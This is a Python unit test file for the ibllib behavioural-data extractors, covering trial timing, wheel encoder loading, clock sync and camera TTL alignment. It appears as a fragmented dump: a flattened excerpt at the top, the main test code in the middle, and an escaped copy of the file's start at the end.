in data]) self.assertTrue(isinstance(gct, np.ndarray)) # -- version >= 5.0.0 gct = biased_trials.GoCueTriggerTimes( self.biased_ge5['path']).extract()[0] self.assertTrue(isinstance(gct, np.ndarray)) def test_get_goCueOnset_times(self): # TRAINING SESSIONS gcot = training_trials.GoCueTimes( self.training_lt5['path']).extract()[0] self.assertTrue(isinstance(gcot, np.ndarray)) self.assertTrue(np.all(np.isnan(gcot))) self.assertTrue(gcot.size != 0 or gcot.size == 4) # -- version >= 5.0.0 gcot = training_trials.GoCueTimes( self.training_ge5['path']).extract()[0] self.assertTrue(isinstance(gcot, np.ndarray)) self.assertFalse(np.any(np.isnan(gcot))) self.assertTrue(gcot.size != 0 or gcot.size == 12) # BIASED SESSIONS gcot = biased_trials.GoCueTimes( self.biased_lt5['path']).extract()[0] self.assertTrue(isinstance(gcot, np.ndarray)) self.assertFalse(np.any(np.isnan(gcot))) self.assertTrue(gcot.size != 0 or gcot.size == 4) # -- version >= 5.0.0 gcot = biased_trials.GoCueTimes( self.biased_ge5['path']).extract()[0] self.assertTrue(isinstance(gcot, np.ndarray)) self.assertFalse(np.any(np.isnan(gcot))) self.assertTrue(gcot.size != 0 or gcot.size == 8) def test_get_included_trials_lt5(self): # TRAINING SESSIONS it = training_trials.IncludedTrials( self.training_lt5['path']).extract()[0] self.assertTrue(isinstance(it, np.ndarray)) # BIASED SESSIONS it = biased_trials.IncludedTrials( self.biased_lt5['path']).extract()[0] self.assertTrue(isinstance(it, np.ndarray)) def test_get_included_trials_ge5(self): # TRAINING SESSIONS it = 

    def test_get_included_trials(self):
        # TRAINING SESSIONS
        it = training_trials.IncludedTrials(
            self.training_lt5['path']).extract(settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]
        self.assertTrue(isinstance(it, np.ndarray))
        # -- version >= 5.0.0
        it = training_trials.IncludedTrials(
            self.training_ge5['path']).extract()[0]
        self.assertTrue(isinstance(it, np.ndarray))

        # BIASED SESSIONS
        it = biased_trials.IncludedTrials(
            self.biased_lt5['path']).extract(settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]
        self.assertTrue(isinstance(it, np.ndarray))
        # -- version >= 5.0.0
        it = biased_trials.IncludedTrials(
            self.biased_ge5['path']).extract()[0]
        self.assertTrue(isinstance(it, np.ndarray))

    @wheelMoves_fixture
    def test_extract_all(self):
        # TRAINING SESSIONS
        # Expect an error raised because no wheel moves were present in test data
        with self.assertRaises(ValueError) as ex:
            training_trials.extract_all(
                self.training_lt5['path'], settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)
        self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty', str(ex.exception))
        # -- version >= 5.0.0
        out, files = training_trials.extract_all(self.training_ge5['path'], save=True)
        self.assertEqual(19, len(out))
        self.assertTrue(all(map(Path.exists, files)))

        # BIASED SESSIONS
        # The new trials extractor additionally extracts the wheel data and this fails for the < 5.0
        # test data so we will stub the wheel extractor
        with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel') as Wheel:
            Wheel.var_names = tuple()
            Wheel().extract.return_value = ({}, [])
            out, files = biased_trials.extract_all(
                self.biased_lt5['path'], settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)
            self.assertEqual(15, len(out))
            self.assertTrue(all(map(Path.exists, files)))
        # -- version >= 5.0.0
        out, files = biased_trials.extract_all(self.biased_ge5['path'], save=True)
        self.assertEqual(19, len(out))
        self.assertTrue(all(map(Path.exists, files)))
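
    # NOTE (editor's sketch): ``test_extract_all`` stubs out the heavy Wheel
    # extractor with ``unittest.mock.patch``. The same pattern, reduced to its
    # essentials (target name hypothetical, not part of this suite):
    #
    #     with unittest.mock.patch('package.module.HeavyExtractor') as Heavy:
    #         Heavy.var_names = tuple()
    #         Heavy().extract.return_value = ({}, [])
    #         ...  # the code under test now receives the stubbed (data, files)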

    def test_encoder_positions_clock_reset(self):
        # TRAINING SESSIONS
        # only for training?
        path = self.training_lt5['path'] / "raw_behavior_data"
        path = next(path.glob("_iblrig_encoderPositions.raw*.ssv"), None)
        dy = raw._load_encoder_positions_file_lt5(path)
        dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206, 1853979, 1859144])
        self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))
        self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))

    def test_encoder_positions_clock_errors(self):
        # here we test for 2 kinds of file corruption that happen
        # 1/2 the first sample time is corrupt and absurdly high and should be discarded
        # 2/2 2 samples are swapped and need to be swapped back
        path = self.biased_lt5['path'] / "raw_behavior_data"
        path = next(path.glob("_iblrig_encoderPositions.raw*.ssv"), None)
        dy = raw._load_encoder_positions_file_lt5(path)
        self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))
        # -- version >= 5.0.0
        path = self.biased_ge5['path'] / "raw_behavior_data"
        path = next(path.glob("_iblrig_encoderPositions.raw*.ssv"), None)
        dy = raw._load_encoder_positions_file_ge5(path)
        self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))

    def test_wheel_folders(self):
        # the wheel folder contains other errors in bpod output that had to be addressed
        for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'):
            df = raw._load_encoder_positions_file_lt5(wf)
            self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
        for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):
            df = raw._load_encoder_events_file_lt5(wf)
            self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
        for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'):
            df = raw._load_encoder_positions_file_ge5(wf)
            self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
        for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):
            df = raw._load_encoder_events_file_ge5(wf)
            self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))

    def test_load_encoder_positions(self):
        raw.load_encoder_positions(self.training_lt5['path'],
                                   settings={'IBLRIG_VERSION_TAG': '4.9.9'})
        raw.load_encoder_positions(self.training_ge5['path'])
        raw.load_encoder_positions(self.biased_lt5['path'],
                                   settings={'IBLRIG_VERSION_TAG': '4.9.9'})
        raw.load_encoder_positions(self.biased_ge5['path'])

    def test_load_encoder_events(self):
        raw.load_encoder_events(self.training_lt5['path'],
                                settings={'IBLRIG_VERSION_TAG': '4.9.9'})
        raw.load_encoder_events(self.training_ge5['path'])
        raw.load_encoder_events(self.biased_lt5['path'],
                                settings={'IBLRIG_VERSION_TAG': '4.9.9'})
        raw.load_encoder_events(self.biased_ge5['path'])

    def test_size_outputs(self):
        # check the output dimensions
        # VERSION >= 5.0.0
        from ibllib.io.extractors.bpod_trials import extract_all
        extract_all(self.training_ge5['path'])
        trials = alfio.load_object(self.training_ge5['path'] / 'alf', object='trials')
        self.assertTrue(alfio.check_dimensions(trials) == 0)
        extract_all(self.biased_ge5['path'])
        trials = alfio.load_object(self.biased_ge5['path'] / 'alf', object='trials')
        self.assertTrue(alfio.check_dimensions(trials) == 0)
        # VERSION < 5.0.0
        # for these test data there are no wheel moves so let's mock the output
        mock_data = {
            'intervals': np.array([[0, 1], ]),
            'peakAmplitude': np.array([1, 1]),
            'peakVelocity_times': np.array([1, 1])}
        function_name = 'ibllib.io.extractors.training_wheel.extract_wheel_moves'
        # Training
        with unittest.mock.patch(function_name, return_value=mock_data):
            extract_all(self.training_lt5['path'])
        trials = alfio.load_object(self.training_lt5['path'] / 'alf', object='trials')
        self.assertTrue(alfio.check_dimensions(trials) == 0)
        # Biased
        with unittest.mock.patch(function_name, return_value=mock_data):
            extract_all(self.biased_lt5['path'])
        trials = alfio.load_object(self.biased_lt5['path'] / 'alf', object='trials')
        self.assertTrue(alfio.check_dimensions(trials) == 0)
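
    # NOTE (editor's sketch): ``test_encoder_positions_clock_reset`` above implies
    # the rotary-encoder timestamps are a 32-bit counter that the loader unwraps
    # by adding 2 ** 32 after a wrap (hence ``re_ts[6:] - 2 ** 32 - dat == 0``).
    # An equivalent unwrap, assuming that behaviour:
    #
    #     ts = np.asarray([4294967290, 4294967295, 3, 8], dtype=np.int64)
    #     wraps = np.cumsum(np.diff(ts, prepend=ts[0]) < 0) * 2 ** 32
    #     unwrapped = ts + wraps  # strictly increasing afterwards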

    def tearDown(self):
        for f in self.main_path.rglob('_ibl_log.*.log'):
            f.unlink()
        [x.unlink() for x in self.training_lt5['path'].rglob('alf/*') if x.is_file()]
        [x.unlink() for x in self.biased_lt5['path'].rglob('alf/*') if x.is_file()]
        [x.unlink() for x in self.training_ge5['path'].rglob('alf/*') if x.is_file()]
        [x.unlink() for x in self.biased_ge5['path'].rglob('alf/*') if x.is_file()]
        [x.rmdir() for x in self.training_lt5['path'].rglob('alf/') if x.is_dir()]
        [x.rmdir() for x in self.biased_lt5['path'].rglob('alf/') if x.is_dir()]
        [x.rmdir() for x in self.training_ge5['path'].rglob('alf/') if x.is_dir()]
        [x.rmdir() for x in self.biased_ge5['path'].rglob('alf/') if x.is_dir()]


class TestSyncWheelBpod(unittest.TestCase):

    def test_sync_bpod_bonsai_poor_quality_timestamps(self):
        sync_trials_robust = raw.sync_trials_robust
        drift_pol = np.array([11 * 1e-6, -20])  # bpod starts 20 secs before with 11 ppm drift
        np.random.seed(seed=784)
        t0_full = np.cumsum(np.random.rand(50)) + .001
        t1_full = np.polyval(drift_pol, t0_full) + t0_full
        t0 = t0_full.copy()
        t1 = t1_full.copy()

        t0_, t1_ = sync_trials_robust(t0, t1)
        assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)

        t0_, t1_ = sync_trials_robust(t0, t1[:-1])
        assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)

        t0_, t1_ = sync_trials_robust(t0, t1[1:])
        assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)

        t0_, t1_ = sync_trials_robust(t0[1:], t1)
        assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)

        t0_, t1_ = sync_trials_robust(t0[:-1], t1)
        assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)

        t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))
        assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)

        t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))
        assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)


class TestWheelLoaders(unittest.TestCase):

    def setUp(self) -> None:
        self.main_path = Path(__file__).parent

    def test_encoder_events_corrupt(self):
        path = self.main_path.joinpath('data', 'wheel', 'lt5')
        for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):
            dy = raw._load_encoder_events_file_lt5(file_events)
            self.assertTrue(dy.size > 6)
        path = self.main_path.joinpath('data', 'wheel', 'ge5')
        for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):
            dy = raw._load_encoder_events_file_ge5(file_events)
            self.assertTrue(dy.size > 6)

    def test_encoder_positions_corrupts(self):
        path = self.main_path.joinpath('data', 'wheel', 'ge5')
        for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):
            dy = raw._load_encoder_positions_file_ge5(file_position)
            self.assertTrue(dy.size > 18)
        path = self.main_path.joinpath('data', 'wheel', 'lt5')
        for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):
            dy = raw._load_encoder_positions_file_lt5(file_position)
            self.assertTrue(dy.size > 18)


class MockExtracor(BaseExtractor):
    save_names = (
        "some_file.csv",
        "some_file.tsv",
        "some_file.ssv",
        "some_file.npy",
    )
    var_names = (
        "csv",
        "ssv",
        "tsv",
        "npy",
    )

    def _extract(self, **kwargs) -> tuple:
        csv = pd.DataFrame([1, 2, 3])
        ssv = pd.DataFrame([1, 2, 3])
        tsv = pd.DataFrame([1, 2, 3])
        npy = np.array([1, 2, 3])

        return (csv, ssv, tsv, npy)
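

# NOTE (editor): in ``BaseExtractor`` subclasses the i-th entry of ``var_names``
# is presumably written to the i-th filename in ``save_names``, with the file
# extension selecting the serializer (.csv/.ssv/.tsv vs .npy); this is an
# assumption inferred from the mock, not verified here. The mock's
# ``save_names`` order (csv, tsv, ssv, npy) differs from its ``var_names``
# order (csv, ssv, tsv, npy), which the saving test below cannot detect
# because every variable holds the same three values.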


class TestBaseExtractorSavingMethods(unittest.TestCase):
    def setUp(self) -> None:
        self.tempdir = tempfile.TemporaryDirectory()
        self.session_path = self.tempdir.name
        # self.addClassCleanup(tempdir.cleanup)  # py3.8
        self.mock_extractor = MockExtracor(self.session_path)

    def test_saving_method(self):
        data, paths = self.mock_extractor.extract(save=True)
        self.assertTrue(all([x.exists() for x in paths]))

    def tearDown(self):
        self.tempdir.cleanup()


class TestCameraExtractors(unittest.TestCase):
    def test_groom_pin_state(self):
        # UNIT DATA
        fps = 60
        t_offset = 39.4
        ts = np.arange(0, 10, 1 / fps) + t_offset
        # Add drift
        ts += np.full_like(ts, 1e-4).cumsum()
        n_pulses = 2
        pulse_width = 0.3
        duty = 0.5
        gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),
                'polarities': np.ones(n_pulses * 2, dtype=np.int32)}
        gpio['polarities'][1::2] = -1
        aud_offset = 40.
        audio = {'times': np.empty(n_pulses * 2),
                 'polarities': gpio['polarities']}
        for p in range(n_pulses):
            i = p * 2
            rise = (pulse_width * p) + duty * p + 1
            audio['times'][i] = aud_offset + rise
            audio['times'][i + 1] = audio['times'][i] + pulse_width
            rise += t_offset
            gpio['indices'][i] = np.where(ts > rise)[0][0]
            gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]

        gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)
        self.assertEqual(audio, audio_, 'Audio dict shouldn\'t be affected')
        np.testing.assert_array_almost_equal(ts_[:4], [40., 40.016667, 40.033333, 40.05])

        # Broken TTLs + extra TTL
        delay = 0.08
        pulse_width = 1e-5
        t = audio['times'][0] + delay
        audio['times'] = np.sort(np.append(audio['times'], [t, t + pulse_width, 80]))
        audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)
        audio['polarities'][1::2] = -1

        gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff=5e-3)
        self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)

        # One front shifted by a large amount
        audio['times'][4] -= 0.3
        gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, tolerance=.1, min_diff=5e-3)
        self.assertTrue(np.all(gpio_['times'] == audio_['times']))
        self.assertTrue(np.all(gpio_['times'] == np.array([41., 41.3])))
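
    # NOTE (editor's arithmetic check): with ``pulse_width = 0.3`` and
    # ``duty = 0.5``, the synthetic audio fronts land at
    # ``rise = 0.3 * p + 0.5 * p + 1`` for pulse p, i.e. 41.0/41.3 (pulse 0)
    # and 41.8/42.1 (pulse 1) after the 40 s offset, which is why the final
    # assertion above expects ``gpio_['times'] == [41., 41.3]`` once the
    # shifted front and the broken TTLs have been discarded.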

    def test_attribute_times(self, display=False):
        # Create two timestamp arrays at two different frequencies
        tsa = np.linspace(0, 60, 60 * 4)[:60]  # 240bpm
        tsb = np.linspace(0, 60, 60 * 3)[:45]  # 180bpm
        tsa = np.sort(np.append(tsa, .4))  # Add ambiguous front
        tsb = np.sort(np.append(tsb, .41))
        if display:
            from ibllib.plots import vertical_lines
            import matplotlib.pyplot as plt
            vertical_lines(tsb, linestyle=':', color='r', label='tsb')
            vertical_lines(tsa, linestyle=':', color='b', label='tsa')
            plt.legend()

        # Check with default args
        matches = camera.attribute_times(tsa, tsb)
        expected = np.array(
            [0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17, 18, 20, 21,
             22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38, 40, 41, 42, 44,
             45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60]
        )
        np.testing.assert_array_equal(matches, expected)
        self.assertEqual(matches.size, tsb.size)

        # Taking closest instead of first should change index of ambiguous front
        matches = camera.attribute_times(tsa, tsb, take='nearest')
        expected[np.r_[1:3]] = expected[1:3] + 1
        np.testing.assert_array_equal(matches, expected)

        # Taking first after should exclude many pulses
        matches = camera.attribute_times(tsa, tsb, take='after')
        missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20,
                   22, 23, 25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]
        expected[missing] = -1
        np.testing.assert_array_equal(matches, expected)

        # Lower tolerance
        matches = camera.attribute_times(tsa, tsb, tol=0.05)
        expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45, 49, 53, 57])
        np.testing.assert_array_equal(matches[matches > -1], expected)

        # Remove injective assert
        matches = camera.attribute_times(tsa, tsb, injective=False, take='nearest')
        expected = np.array(
            [0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17, 18, 20, 21, 22,
             24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38, 40, 41, 42, 44, 45,
             46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60]
        )
        np.testing.assert_array_equal(matches, expected)

        # Check input validation
        with self.assertRaises(ValueError):
            camera.attribute_times(tsa, tsb, injective=False, take='closest')


if __name__ == "__main__":
    unittest.main(exit=False, verbosity=2)
[ "import functools\nimport shutil\nimport tempfile\nimport unittest\nimport unittest.mock\nfrom pathlib import Path\n\nimport numpy as np\nimport pandas as pd\n\nimport one.alf.io as alfio\nfrom ibllib.io.extractors import training_trials, biased_trials, camera\nfrom ibllib.io import raw_data_loaders as raw\nfrom ibllib.io.extractors.base import BaseExtractor\n\n\ndef wheelMoves_fixture(func):\n \"\"\"Decorator to save some dummy wheelMoves ALF files for extraction tests\"\"\"\n @functools.wraps(func)\n def wrapper(obj=None):\n # Save some wheelMoves ALF files\n attr_list = ['training_lt5',\n 'training_ge5',\n 'biased_lt5',\n 'biased_ge5']\n alf_paths = [getattr(obj, p)['path'] / 'alf' for p in attr_list]\n n_trials = [getattr(obj, p)['ntrials'] for p in attr_list]\n for p, n in zip(alf_paths, n_trials):\n p.mkdir()\n np.save(str(p / '_ibl_wheelMoves.intervals.npy'), np.zeros((n, 2)))\n np.save(str(p / '_ibl_wheelMoves.peakAmplitude.npy'), np.zeros(n))\n\n # Run method\n func(obj)\n\n # Teardown; delete the files\n for p in alf_paths:\n shutil.rmtree(p)\n return wrapper\n\n\nclass TestExtractTrialData(unittest.TestCase):\n\n def setUp(self):\n self.main_path = Path(__file__).parent\n self.training_lt5 = {'path': self.main_path / 'data' / 'session_training_lt5'}\n self.biased_lt5 = {'path': self.main_path / 'data' / 'session_biased_lt5'}\n self.training_ge5 = {'path': self.main_path / 'data' / 'session_training_ge5'}\n self.biased_ge5 = {'path': self.main_path / 'data' / 'session_biased_ge5'}\n self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5['path']))\n self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path']))\n self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5['path']))\n self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path']))\n # turn off logging for unit testing as we will purposedly go into warning/error cases\n self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'\n self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'\n # Save some dummy wheel moves data for trial firstMovement_times extraction\n\n def test_get_feedbackType(self):\n # TRAINING SESSIONS\n ft = training_trials.FeedbackType(\n self.training_lt5['path']).extract()[0]\n self.assertEqual(ft.size, self.training_lt5['ntrials'])\n # check if no 0's in feedbackTypes\n self.assertFalse(ft[ft == 0].size > 0)\n # -- version >= 5.0.0\n ft = training_trials.FeedbackType(\n self.training_ge5['path']).extract()[0]\n self.assertEqual(ft.size, self.training_ge5['ntrials'])\n # check if no 0's in feedbackTypes\n self.assertFalse(ft[ft == 0].size > 0)\n\n # BIASED SESSIONS\n ft = biased_trials.FeedbackType(\n self.biased_lt5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_lt5['ntrials'])\n # check if no 0's in feedbackTypes\n self.assertFalse(ft[ft == 0].size > 0)\n # -- version >= 5.0.0\n ft = biased_trials.FeedbackType(\n self.biased_ge5['path']).extract()[0]\n self.assertEqual(ft.size, self.biased_ge5['ntrials'])\n # check if no 0's in feedbackTypes\n self.assertFalse(ft[ft == 0].size > 0)\n\n def test_get_contrastLR(self):\n # TRAINING SESSIONS\n cl, cr = training_trials.ContrastLR(\n self.training_lt5['path']).extract()[0]\n self.assertTrue(all([np.sign(x) >= 0 for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([np.sign(x) >= 0 for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n # -- version >= 5.0.0\n cl, cr = 
training_trials.ContrastLR(\n self.training_ge5['path']).extract()[0]\n self.assertTrue(all([np.sign(x) >= 0 for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([np.sign(x) >= 0 for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n\n # BIASED SESSIONS\n cl, cr = biased_trials.ContrastLR(\n self.biased_lt5['path']).extract()[0]\n self.assertTrue(all([np.sign(x) >= 0 for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([np.sign(x) >= 0 for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n # -- version >= 5.0.0\n cl, cr = biased_trials.ContrastLR(\n self.biased_ge5['path']).extract()[0]\n self.assertTrue(all([np.sign(x) >= 0 for x in cl if ~np.isnan(x)]))\n self.assertTrue(all([np.sign(x) >= 0 for x in cr if ~np.isnan(x)]))\n self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))\n self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))\n\n def test_get_probabilityLeft(self):\n # TRAINING SESSIONS\n pl = training_trials.ProbabilityLeft(\n self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n # -- version >= 5.0.0\n pl = training_trials.ProbabilityLeft(\n self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n\n # BIASED SESSIONS\n pl = biased_trials.ProbabilityLeft(\n self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n # Test if only probs that are in prob set\n md = raw.load_settings(self.biased_lt5['path'])\n if md:\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([x in probs for x in pl]) == len(pl))\n # -- version >= 5.0.0\n pl = biased_trials.ProbabilityLeft(\n self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(pl, np.ndarray))\n # Test if only probs that are in prob set\n md = raw.load_settings(self.biased_ge5['path'])\n probs = md['BLOCK_PROBABILITY_SET']\n probs.append(0.5)\n self.assertTrue(sum([x in probs for x in pl]) == len(pl))\n\n def test_get_choice(self):\n # TRAINING SESSIONS\n choice = training_trials.Choice(\n session_path=self.training_lt5['path']).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_lt5['path'])\n trial_nogo = np.array(\n [~np.isnan(t['behavior_data']['States timestamps']['no_go'][0][0])\n for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n # -- version >= 5.0.0\n choice = training_trials.Choice(\n session_path=self.training_ge5['path']).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.training_ge5['path'])\n trial_nogo = np.array(\n [~np.isnan(t['behavior_data']['States timestamps']['no_go'][0][0])\n for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n\n # BIASED SESSIONS\n choice = biased_trials.Choice(\n session_path=self.biased_lt5['path']).extract(save=False)[0]\n self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_lt5['path'])\n trial_nogo = np.array(\n [~np.isnan(t['behavior_data']['States timestamps']['no_go'][0][0])\n for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n # -- version >= 5.0.0\n choice = biased_trials.Choice(\n session_path=self.biased_ge5['path']).extract(save=False)[0]\n 
self.assertTrue(isinstance(choice, np.ndarray))\n data = raw.load_data(self.biased_ge5['path'])\n trial_nogo = np.array(\n [~np.isnan(t['behavior_data']['States timestamps']['no_go'][0][0])\n for t in data])\n if any(trial_nogo):\n self.assertTrue(all(choice[trial_nogo]) == 0)\n\n def test_get_repNum(self):\n # TODO: Test its sawtooth\n # TRAINING SESSIONS\n rn = training_trials.RepNum(\n self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rn, np.ndarray))\n for i in range(3):\n self.assertTrue(i in rn)\n # -- version >= 5.0.0\n rn = training_trials.RepNum(\n self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rn, np.ndarray))\n for i in range(4):\n self.assertTrue(i in rn)\n\n # BIASED SESSIONS have no repeted trials\n\n def test_get_rewardVolume(self):\n # TRAINING SESSIONS\n rv = training_trials.RewardVolume(\n self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n # -- version >= 5.0.0\n rv = training_trials.RewardVolume(\n self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n\n # BIASED SESSIONS\n rv = biased_trials.RewardVolume(\n self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n # Test if all non zero rewards are of the same value\n self.assertTrue(all([x == max(rv) for x in rv if x != 0]))\n # -- version >= 5.0.0\n rv = biased_trials.RewardVolume(\n self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(rv, np.ndarray))\n # Test if all non zero rewards are of the same value\n self.assertTrue(all([x == max(rv) for x in rv if x != 0]))\n\n def test_get_feedback_times_ge5(self):\n # TRAINING SESSIONS\n ft = training_trials.FeedbackTimes(\n self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n # BIASED SESSIONS\n ft = biased_trials.FeedbackTimes(\n self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_feedback_times_lt5(self):\n # TRAINING SESSIONS\n ft = training_trials.FeedbackTimes(\n self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n # BIASED SESSIONS\n ft = biased_trials.FeedbackTimes(\n self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(ft, np.ndarray))\n\n def test_get_stimOnTrigger_times(self):\n # TRAINING SESSIONS\n sott = training_trials.StimOnTriggerTimes(\n self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n # -- version >= 5.0.0\n sott = training_trials.StimOnTriggerTimes(\n self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n # BIASED SESSIONS\n sott = biased_trials.StimOnTriggerTimes(\n self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n # -- version >= 5.0.0\n sott = biased_trials.StimOnTriggerTimes(\n self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(sott, np.ndarray))\n\n def test_get_stimOn_times_lt5(self):\n # TRAINING SESSIONS\n st = training_trials.StimOnTimes_deprecated(\n self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n # BIASED SESSIONS\n st = biased_trials.StimOnTimes_deprecated(\n self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_get_stimOn_times_ge5(self):\n # TRAINING SESSIONS\n st = training_trials.StimOnTimes_deprecated(\n self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n # BIASED SESSIONS\n st = 
biased_trials.StimOnTimes_deprecated(\n self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(st, np.ndarray))\n\n def test_stimOnOffFreeze_times(self):\n # TRAINING SESSIONS\n st = training_trials.StimOnOffFreezeTimes(\n self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n\n # BIASED SESSIONS\n st = biased_trials.StimOnOffFreezeTimes(\n self.biased_lt5['path']).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n\n # TRAINING SESSIONS\n st = training_trials.StimOnOffFreezeTimes(\n self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n\n # BIASED SESSIONS\n st = biased_trials.StimOnOffFreezeTimes(\n self.biased_ge5['path']).extract()[0]\n self.assertTrue(isinstance(st[0], np.ndarray))\n\n def test_get_intervals(self):\n # TRAINING SESSIONS\n di = training_trials.Intervals(\n self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n # -- version >= 5.0.0\n di = training_trials.Intervals(\n self.training_ge5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n\n # BIASED SESSIONS\n di = biased_trials.Intervals(\n self.training_lt5['path']).extract()[0]\n self.assertTrue(isinstance(di, np.ndarray))\n self.assertFalse(np.isnan(di).all())\n # -- version >= 5.0.0\n di = biased_trials.Intervals(\n self.training_ge5['path']).extract()[0]\n 